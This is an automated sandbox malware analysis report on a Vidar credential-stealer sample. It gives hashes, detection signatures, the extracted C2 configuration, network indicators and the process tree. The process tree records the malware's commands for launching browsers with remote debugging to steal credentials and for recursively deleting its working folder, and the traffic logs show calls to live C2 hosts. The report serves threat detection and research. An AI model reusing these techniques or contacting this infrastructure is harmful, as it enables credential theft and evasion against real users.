Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
pjthjsdjgjrtavv.exe

Overview

General Information

Sample name:pjthjsdjgjrtavv.exe
Analysis ID:1578710
MD5:1d0fb45faa5b7a8b398703596d67c967
SHA1:b326e3801b56b5ed86ae66249e6ea64cdefa1997
SHA256:4e0453e61609c04bce1071d29f21abc82800e11261e284ca3250fd8655239456
Tags:exeVidaruser-lontze7
Infos:

Detection

Vidar
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Attempt to bypass Chrome Application-Bound Encryption
Found malware configuration
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected Powershell download and execute
Yara detected Vidar stealer
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found many strings related to Crypto-Wallets (likely being stolen)
Machine Learning detection for sample
Monitors registry run keys for changes
PE file has a writeable .text section
Searches for specific processes (likely to inject)
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to harvest and steal Bitcoin Wallet information
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
Contains functionality to dynamically determine API calls
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Extensive use of GetProcAddress (often used to hide API calls)
Found evaded block containing many API calls
Found evasive API chain (date check)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
PE file contains sections with non-standard names
Queries information about the installed CPU (vendor, model number etc)
Queries the volume information (name, serial number etc) of a device
Sigma detected: Browser Started with Remote Debugging
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Yara detected Credential Stealer

Classification

Process Tree

  • System is w10x64
  • pjthjsdjgjrtavv.exe (PID: 6960 cmdline: "C:\Users\user\Desktop\pjthjsdjgjrtavv.exe" MD5: 1D0FB45FAA5B7A8B398703596D67C967)
    • chrome.exe (PID: 7432 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default" MD5: 5BBFA6CBDF4C254EB368D534F9E23C92)
      • chrome.exe (PID: 7680 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2408 --field-trial-handle=2028,i,10443688959258362392,15587232465003949149,262144 /prefetch:8 MD5: 5BBFA6CBDF4C254EB368D534F9E23C92)
    • msedge.exe (PID: 3380 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory="Default" MD5: 69222B8101B0601CC6663F8381E7E00F)
      • msedge.exe (PID: 6772 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2288 --field-trial-handle=2248,i,213816145862176203,3127195056463773546,262144 /prefetch:3 MD5: 69222B8101B0601CC6663F8381E7E00F)
    • cmd.exe (PID: 7820 cmdline: "C:\Windows\system32\cmd.exe" /c timeout /t 10 & rd /s /q "C:\ProgramData\Z5PPP8Q1NYCB" & exit MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 8308 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • timeout.exe (PID: 4260 cmdline: timeout /t 10 MD5: 976566BEEFCCA4A159ECBDB2D4B1A3E3)
  • msedge.exe (PID: 7492 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory=Default --flag-switches-begin --flag-switches-end --disable-nacl --do-not-de-elevate MD5: 69222B8101B0601CC6663F8381E7E00F)
    • msedge.exe (PID: 1552 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2176 --field-trial-handle=2044,i,5460801257270937399,511870453341011601,262144 /prefetch:3 MD5: 69222B8101B0601CC6663F8381E7E00F)
    • msedge.exe (PID: 5880 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-GB --service-sandbox-type=asset_store_service --mojo-platform-channel-handle=6832 --field-trial-handle=2044,i,5460801257270937399,511870453341011601,262144 /prefetch:8 MD5: 69222B8101B0601CC6663F8381E7E00F)
    • msedge.exe (PID: 7668 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-GB --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --mojo-platform-channel-handle=6980 --field-trial-handle=2044,i,5460801257270937399,511870453341011601,262144 /prefetch:8 MD5: 69222B8101B0601CC6663F8381E7E00F)
    • msedge.exe (PID: 8416 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_search_indexer.mojom.SearchIndexerInterfaceBroker --lang=en-GB --service-sandbox-type=search_indexer --message-loop-type-ui --mojo-platform-channel-handle=5396 --field-trial-handle=2044,i,5460801257270937399,511870453341011601,262144 /prefetch:8 MD5: 69222B8101B0601CC6663F8381E7E00F)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
VidarVidar is a forked malware based on Arkei. It seems this stealer is one of the first that is grabbing information on 2FA Software and Tor Browser.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.vidar

Malware Configuration

Threatname: Vidar

{"C2 url": "https://steamcommunity.com/profiles/76561199809363512", "Botnet": "m0nk3"}

Yara Signatures

Initial Sample

SourceRuleDescriptionAuthorStrings
pjthjsdjgjrtavv.exeJoeSecurity_Vidar_1Yara detected Vidar stealerJoe Security

    PCAP (Network Traffic)

    SourceRuleDescriptionAuthorStrings
    sslproxydump.pcapJoeSecurity_Vidar_1Yara detected Vidar stealerJoe Security

      Memory Dumps

      SourceRuleDescriptionAuthorStrings
      00000000.00000002.1961335058.00000000004DD000.00000004.00000001.01000000.00000003.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
        Process Memory Space: pjthjsdjgjrtavv.exe PID: 6960JoeSecurity_Vidar_1Yara detected Vidar stealerJoe Security
          Process Memory Space: pjthjsdjgjrtavv.exe PID: 6960JoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security
            Process Memory Space: pjthjsdjgjrtavv.exe PID: 6960JoeSecurity_CredentialStealerYara detected Credential StealerJoe Security

              Unpacked PEs

              SourceRuleDescriptionAuthorStrings
              0.2.pjthjsdjgjrtavv.exe.400000.0.unpackJoeSecurity_Vidar_1Yara detected Vidar stealerJoe Security
                0.0.pjthjsdjgjrtavv.exe.400000.0.unpackJoeSecurity_Vidar_1Yara detected Vidar stealerJoe Security

                  Sigma Signatures

                  System Summary

                  barindex
                  Sigma detected: Browser Started with Remote Debugging
                  Source: Process startedAuthor: pH-T (Nextron Systems), Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default", CommandLine: "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default", CommandLine|base64offset|contains: ^", Image: C:\Program Files\Google\Chrome\Application\chrome.exe, NewProcessName: C:\Program Files\Google\Chrome\Application\chrome.exe, OriginalFileName: C:\Program Files\Google\Chrome\Application\chrome.exe, ParentCommandLine: "C:\Users\user\Desktop\pjthjsdjgjrtavv.exe", ParentImage: C:\Users\user\Desktop\pjthjsdjgjrtavv.exe, ParentProcessId: 6960, ParentProcessName: pjthjsdjgjrtavv.exe, ProcessCommandLine: "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default", ProcessId: 7432, ProcessName: chrome.exe

                  Suricata Signatures

                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2024-12-20T07:31:16.665004+010020442471Malware Command and Control Activity Detected116.203.12.114443192.168.2.749709TCP
                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2024-12-20T07:31:18.966565+010020518311Malware Command and Control Activity Detected116.203.12.114443192.168.2.749715TCP
                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2024-12-20T07:31:14.357306+010020490871A Network Trojan was detected192.168.2.749703116.203.12.114443TCP
                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2024-12-20T07:31:12.064761+010028593781Malware Command and Control Activity Detected192.168.2.749701116.203.12.114443TCP

                  Joe Sandbox Signatures

                  Click to jump to signature section

                  Show All Signature Results

                  AV Detection

                  barindex
                  Found malware configuration
                  Source: pjthjsdjgjrtavv.exeMalware Configuration Extractor: Vidar {"C2 url": "https://steamcommunity.com/profiles/76561199809363512", "Botnet": "m0nk3"}
                  Multi AV Scanner detection for submitted file
                  Source: pjthjsdjgjrtavv.exeVirustotal: Detection: 48%Perma Link
                  Source: pjthjsdjgjrtavv.exeReversingLabs: Detection: 57%
                  AI detected suspicious sample
                  Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                  Machine Learning detection for sample
                  Source: pjthjsdjgjrtavv.exeJoe Sandbox ML: detected
                  Source: C:\Users\user\Desktop\pjthjsdjgjrtavv.exeCode function: 0_2_004078F0 StrStrA,lstrlenA,LocalAlloc,CryptUnprotectData,LocalAlloc,LocalFree,lstrlenA,0_2_004078F0
                  Source: C:\Users\user\Desktop\pjthjsdjgjrtavv.exeCode function: 0_2_004116B0 CryptBinaryToStringA,HeapAlloc,GetProcessHeap,RtlAllocateHeap,CryptBinaryToStringA,GetLastError,HeapFree,GetProcessHeap,HeapFree,0_2_004116B0
                  Source: pjthjsdjgjrtavv.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                  Source: unknownHTTPS traffic detected: 149.154.167.99:443 -> 192.168.2.7:49699 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 116.203.12.114:443 -> 192.168.2.7:49700 version: TLS 1.2
                  Source: C:\Users\user\Desktop\pjthjsdjgjrtavv.exeCode function: 0_2_00409460 FindFirstFileA,FindFirstFileA,CopyFileA,CopyFileA,FindNextFileA,strlen,memcmp,??3@YAXPAX@Z,??3@YAXPAX@Z,StrCmpCA,FindClose,0_2_00409460
                  Source: C:\Users\user\Desktop\pjthjsdjgjrtavv.exeCode function: 0_2_00407060 FindFirstFileA,strlen,strlen,memcpy,OpenDesktopA,CreateDesktopA,lstrcpyA,lstrcpyA,strlen,Sleep,??3@YAXPAX@Z,??3@YAXPAX@Z,CreateProcessA,Sleep,strlen,Sleep,strlen,strlen,??3@YAXPAX@Z,CloseDesktop,_invalid_parameter_noinfo_noreturn,0_2_00407060
                  Source: C:\Users\user\Desktop\pjthjsdjgjrtavv.exeCode function: 0_2_004170D0 SHGetFolderPathA,wsprintfA,FindFirstFileA,FindNextFileA,FindNextFileA,FindNextFileA,strcpy,_splitpath,strcpy,strlen,isupper,wsprintfA,strcpy,strlen,SHFileOperationA,FindClose,0_2_004170D0
                  Source: C:\Users\user\Desktop\pjthjsdjgjrtavv.exeCode function: 0_2_00401730 FindFirstFileA,FindFirstFileA,FindClose,FindNextFileA,strlen,memcmp,strlen,memcmp,??3@YAXPAX@Z,??3@YAXPAX@Z,FindFirstFileA,FindFirstFileA,DeleteFileA,DeleteFileA,FindNextFileA,CopyFileA,CopyFileA,CopyFileA,CopyFileA,DeleteFileA,DeleteFileA,FindClose,_invalid_parameter_noinfo_noreturn,0_2_00401730
                  Source: C:\Users\user\Desktop\pjthjsdjgjrtavv.exeCode function: 0_2_0040A5D0 FindFirstFileA,FindFirstFileA,FindNextFileA,strlen,memcmp,??3@YAXPAX@Z,??3@YAXPAX@Z,StrCmpCA,StrCmpCA,0_2_0040A5D0
                  Source: C:\Users\user\Desktop\pjthjsdjgjrtavv.exeCode function: 0_2_00414BD0 wsprintfA,FindFirstFileA,FindNextFileA,strlen,memcmp,strlen,memcmp,??3@YAXPAX@Z,??3@YAXPAX@Z,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,FindClose,_invalid_parameter_noinfo_noreturn,RegOpenKeyExA,RegQueryValueExA,RegCloseKey,lstrcatA,lstrcatA,0_2_00414BD0
                  Source: C:\Users\user\Desktop\pjthjsdjgjrtavv.exeCode function: 0_2_00406FE0 FindFirstFileA,FindFirstFileA,??3@YAXPAX@Z,_invalid_parameter_noinfo_noreturn,0_2_00406FE0
                  Source: C:\Users\user\Desktop\pjthjsdjgjrtavv.exeCode function: 0_2_00413FF0 wsprintfA,FindFirstFileA,memset,memset,FindNextFileA,strlen,memcmp,strlen,memcmp,??3@YAXPAX@Z,??3@YAXPAX@Z,wsprintfA,StrCmpCA,wsprintfA,memset,lstrcatA,strtok_s,memset,lstrcatA,DeleteFileA,DeleteFileA,strtok_s,PathMatchSpecA,DeleteFileA,DeleteFileA,CopyFileA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,FindClose,_invalid_parameter_noinfo_noreturn,GetLogicalDriveStringsA,memset,GetDriveTypeA,lstrcpyA,lstrcpyA,lstrlenA,0_2_00413FF0
                  Source: C:\Users\user\Desktop\pjthjsdjgjrtavv.exeCode function: 0_2_0040C790 FindFirstFileA,FindFirstFileA,FindNextFileA,strlen,memcmp,strlen,memcmp,??3@YAXPAX@Z,??3@YAXPAX@Z,StrCmpCA,CopyFileA,CopyFileA,CopyFileA,DeleteFileA,DeleteFileA,FindClose,_invalid_parameter_noinfo_noreturn,0_2_0040C790
                  Source: C:\Users\user\Desktop\pjthjsdjgjrtavv.exeCode function: 0_2_004081B0 ExpandEnvironmentStringsA,FindFirstFileA,FindFirstFileA,FindNextFileA,strlen,memcmp,strlen,memcmp,??3@YAXPAX@Z,??3@YAXPAX@Z,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,DeleteFileA,StrCmpCA,StrCmpCA,CopyFileA,CopyFileA,CopyFileA,StrCmpCA,StrCmpCA,CopyFileA,CopyFileA,Sleep,StrCmpCA,StrCmpCA,CopyFileA,CopyFileA,DeleteFileA,memset,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,CopyFileA,CopyFileA,DeleteFileA,DeleteFileA,memset,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,FindClose,_invalid_parameter_noinfo_noreturn,0_2_004081B0
                  Source: C:\Users\user\Desktop\pjthjsdjgjrtavv.exeCode function: 0_2_0040BC30 wsprintfA,wsprintfA,FindFirstFileA,FindNextFileA,strlen,memcmp,strlen,memcmp,??3@YAXPAX@Z,??3@YAXPAX@Z,lstrlenA,lstrlenA,DeleteFileA,DeleteFileA,CopyFileA,CopyFileA,FindClose,_invalid_parameter_noinfo_noreturn,0_2_0040BC30
                  Source: C:\Users\user\Desktop\pjthjsdjgjrtavv.exeCode function: 0_2_00415700 HeapAlloc,GetProcessHeap,HeapAlloc,wsprintfA,FindFirstFileA,FindNextFileA,strlen,memcmp,strlen,memcmp,??3@YAXPAX@Z,??3@YAXPAX@Z,wsprintfA,CopyFileA,CopyFileA,DeleteFileA,DeleteFileA,FindClose,lstrcatA,lstrcatA,lstrlenA,lstrlenA,_invalid_parameter_noinfo_noreturn,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,0_2_00415700
                  Source: C:\Users\user\Desktop\pjthjsdjgjrtavv.exeCode function: 0_2_00413FF0 wsprintfA,FindFirstFileA,memset,memset,FindNextFileA,strlen,memcmp,strlen,memcmp,??3@YAXPAX@Z,??3@YAXPAX@Z,wsprintfA,StrCmpCA,wsprintfA,memset,lstrcatA,strtok_s,memset,lstrcatA,DeleteFileA,DeleteFileA,strtok_s,PathMatchSpecA,DeleteFileA,DeleteFileA,CopyFileA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,FindClose,_invalid_parameter_noinfo_noreturn,GetLogicalDriveStringsA,memset,GetDriveTypeA,lstrcpyA,lstrcpyA,lstrlenA,0_2_00413FF0
                  Source: C:\Users\user\Desktop\pjthjsdjgjrtavv.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\Jump to behavior
                  Source: C:\Users\user\Desktop\pjthjsdjgjrtavv.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\Jump to behavior
                  Source: C:\Users\user\Desktop\pjthjsdjgjrtavv.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\Jump to behavior
                  Source: C:\Users\user\Desktop\pjthjsdjgjrtavv.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\Jump to behavior
                  Source: C:\Users\user\Desktop\pjthjsdjgjrtavv.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\Jump to behavior
                  Source: C:\Users\user\Desktop\pjthjsdjgjrtavv.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\Jump to behavior

                  Networking

                  barindex
                  Suricata IDS alerts for network traffic
                  Source: Network trafficSuricata IDS: 2049087 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M1 : 192.168.2.7:49703 -> 116.203.12.114:443
                  Source: Network trafficSuricata IDS: 2859378 - Severity 1 - ETPRO MALWARE Win32/Stealc/Vidar Stealer Host Details Exfil (POST) M2 : 192.168.2.7:49701 -> 116.203.12.114:443
                  Source: Network trafficSuricata IDS: 2044247 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config : 116.203.12.114:443 -> 192.168.2.7:49709
                  Source: Network trafficSuricata IDS: 2051831 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config M1 : 116.203.12.114:443 -> 192.168.2.7:49715
                  C2 URLs / IPs found in malware configuration
                  Source: Malware configuration extractorURLs: https://steamcommunity.com/profiles/76561199809363512
                  Source: global trafficHTTP traffic detected: GET /k04ael HTTP/1.1Host: t.meConnection: Keep-AliveCache-Control: no-cache
                  Source: Joe Sandbox ViewIP Address: 23.44.201.19 23.44.201.19
                  Source: Joe Sandbox ViewIP Address: 116.203.12.114 116.203.12.114
                  Source: Joe Sandbox ViewIP Address: 149.154.167.99 149.154.167.99
                  Source: Joe Sandbox ViewIP Address: 149.154.167.99 149.154.167.99
                  Source: Joe Sandbox ViewASN Name: HETZNER-ASDE HETZNER-ASDE
                  Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
                  Source: unknownTCP traffic detected without corresponding DNS query: 104.98.116.138
                  Source: unknownTCP traffic detected without corresponding DNS query: 104.98.116.138
                  Source: unknownTCP traffic detected without corresponding DNS query: 104.98.116.138
                  Source: unknownTCP traffic detected without corresponding DNS query: 20.50.201.200
                  Source: unknownTCP traffic detected without corresponding DNS query: 20.50.201.200
                  Source: unknownTCP traffic detected without corresponding DNS query: 20.50.201.200
                  Source: unknownTCP traffic detected without corresponding DNS query: 20.50.201.200
                  Source: unknownTCP traffic detected without corresponding DNS query: 104.98.116.138
                  Source: unknownTCP traffic detected without corresponding DNS query: 104.98.116.138
                  Source: unknownTCP traffic detected without corresponding DNS query: 104.98.116.138
                  Source: unknownTCP traffic detected without corresponding DNS query: 20.50.201.200
                  Source: unknownTCP traffic detected without corresponding DNS query: 104.98.116.138
                  Source: unknownTCP traffic detected without corresponding DNS query: 20.50.201.200
                  Source: unknownTCP traffic detected without corresponding DNS query: 104.98.116.138
                  Source: unknownTCP traffic detected without corresponding DNS query: 104.98.116.138
                  Source: unknownTCP traffic detected without corresponding DNS query: 104.98.116.138
                  Source: unknownTCP traffic detected without corresponding DNS query: 104.98.116.138
                  Source: unknownTCP traffic detected without corresponding DNS query: 20.50.201.200
                  Source: unknownTCP traffic detected without corresponding DNS query: 23.209.72.28
                  Source: unknownTCP traffic detected without corresponding DNS query: 23.209.72.28
                  Source: unknownTCP traffic detected without corresponding DNS query: 23.209.72.28
                  Source: unknownTCP traffic detected without corresponding DNS query: 23.209.72.28
                  Source: unknownTCP traffic detected without corresponding DNS query: 23.209.72.28
                  Source: unknownTCP traffic detected without corresponding DNS query: 23.209.72.28
                  Source: unknownTCP traffic detected without corresponding DNS query: 23.209.72.28
                  Source: unknownTCP traffic detected without corresponding DNS query: 23.209.72.28
                  Source: unknownTCP traffic detected without corresponding DNS query: 23.209.72.28
                  Source: unknownTCP traffic detected without corresponding DNS query: 23.209.72.28
                  Source: unknownTCP traffic detected without corresponding DNS query: 23.209.72.28
                  Source: unknownTCP traffic detected without corresponding DNS query: 23.209.72.28
                  Source: unknownTCP traffic detected without corresponding DNS query: 20.42.65.90
                  Source: unknownTCP traffic detected without corresponding DNS query: 20.42.65.90
                  Source: unknownTCP traffic detected without corresponding DNS query: 20.42.65.90
                  Source: unknownTCP traffic detected without corresponding DNS query: 18.173.219.113
                  Source: unknownTCP traffic detected without corresponding DNS query: 18.173.219.113
                  Source: unknownTCP traffic detected without corresponding DNS query: 18.173.219.113
                  Source: unknownTCP traffic detected without corresponding DNS query: 23.44.201.30
                  Source: unknownTCP traffic detected without corresponding DNS query: 23.44.201.30
                  Source: unknownTCP traffic detected without corresponding DNS query: 23.44.201.30
                  Source: unknownTCP traffic detected without corresponding DNS query: 23.44.201.30
                  Source: unknownTCP traffic detected without corresponding DNS query: 23.44.201.30
                  Source: unknownTCP traffic detected without corresponding DNS query: 23.44.201.30
                  Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.219
                  Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.219
                  Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.219
                  Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.219
                  Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.219
                  Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.219
                  Source: unknownTCP traffic detected without corresponding DNS query: 20.42.65.90
                  Source: unknownTCP traffic detected without corresponding DNS query: 20.42.65.90
                  Source: C:\Users\user\Desktop\pjthjsdjgjrtavv.exeCode function: 0_2_00404280 InternetOpenA,InternetOpenA,StrCmpCA,InternetConnectA,HttpOpenRequestA,InternetSetOptionA,HttpSendRequestA,HttpQueryInfoA,InternetReadFile,InternetCloseHandle,InternetCloseHandle,0_2_00404280
                  Source: global trafficHTTP traffic detected: GET /k04ael HTTP/1.1Host: t.meConnection: Keep-AliveCache-Control: no-cache
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0Host: frostman.shopConnection: Keep-AliveCache-Control: no-cache
                  Source: global trafficHTTP traffic detected: GET /async/ddljson?async=ntp:2 HTTP/1.1Host: www.google.comConnection: keep-aliveSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
                  Source: global trafficHTTP traffic detected: GET /complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=1&pgcl=20&gs_rn=42&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw HTTP/1.1Host: www.google.comConnection: keep-aliveX-Client-Data: CI62yQEIpLbJAQipncoBCNrwygEIkqHLAQiFoM0BCNy9zQEIucrNAQii0c0BCIrTzQEIpNbNAQj01s0BCKfYzQEI+cDUFRj1yc0BGOuNpRc=Sec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
                  Source: global trafficHTTP traffic detected: GET /async/newtab_ogb?hl=en-US&async=fixed:0 HTTP/1.1Host: www.google.comConnection: keep-aliveX-Client-Data: CI62yQEIpLbJAQipncoBCNrwygEIkqHLAQiFoM0BCNy9zQEIucrNAQii0c0BCIrTzQEIpNbNAQj01s0BCKfYzQEI+cDUFRj1yc0BGOuNpRc=Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
                  Source: global trafficHTTP traffic detected: GET /async/newtab_promos HTTP/1.1Host: www.google.comConnection: keep-aliveSec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
                  Source: global trafficHTTP traffic detected: GET /crx/blobs/AW50ZFvmkG4OHGgRTAu7ED1s4Osp5h4hBv39bA-6HcwOhSY7CGpTiD4wJ46Ud6Bo6P7yWyrRWCx-L37vtqrnUs3U44hGlerneoOywl1xhFHZUyPx_GIMNYxNDzQk9TJs4K4AxlKa5fjk7yW6cw-fwnpof9qnkobSLXrM/GHBMNNJOOEKPMOECNNNILNNBDLOLHKHI_1_85_1_0.crx HTTP/1.1Host: clients2.googleusercontent.comConnection: keep-aliveSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
                  Source: global trafficHTTP traffic detected: GET /b?rn=1734680546567&c1=2&c2=3000001&cs_ucfr=1&c7=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-GB%26title%3DNew%2Btab%26dsp%3D1%26sp%3DBing%26isFREModalBackground%3D1%26startpage%3D1%26PC%3DU531%26ocid%3Dmsedgdhp%26mkt%3Den-us&c8=New+tab&c9=&cs_fpid=2FB26BEE4D14683625707EB54C6669DF&cs_fpit=o&cs_fpdm=*null&cs_fpdt=*null HTTP/1.1Host: sb.scorecardresearch.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
                  Source: global trafficHTTP traffic detected: GET /b2?rn=1734680546567&c1=2&c2=3000001&cs_ucfr=1&c7=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-GB%26title%3DNew%2Btab%26dsp%3D1%26sp%3DBing%26isFREModalBackground%3D1%26startpage%3D1%26PC%3DU531%26ocid%3Dmsedgdhp%26mkt%3Den-us&c8=New+tab&c9=&cs_fpid=2FB26BEE4D14683625707EB54C6669DF&cs_fpit=o&cs_fpdm=*null&cs_fpdt=*null HTTP/1.1Host: sb.scorecardresearch.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8Cookie: UID=139bc9b74b908404e24257b1734676310; XID=139bc9b74b908404e24257b1734676310
